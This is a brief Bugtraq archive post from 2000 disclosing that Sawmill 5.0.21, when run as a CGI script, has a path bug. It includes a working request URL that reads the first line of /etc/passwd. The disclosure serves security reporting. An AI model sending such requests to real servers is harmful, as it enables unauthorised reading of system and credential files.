Bugtraq mailing list archives
Re: sawmill5.0.21 path bug
From: lwc () VAPID DHS ORG (Cashdollar, Larry)
Date: Tue, 27 Jun 2000 15:36:45 -0700
Sawmill can also be run as a cgi script. This method is vulnerable as well. The following will print the first line of the password file http://www.example.com/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 -- Larry Cashdollar
Current thread:
- Re: sawmill5.0.21 path bug Cashdollar, Larry (Jun 27)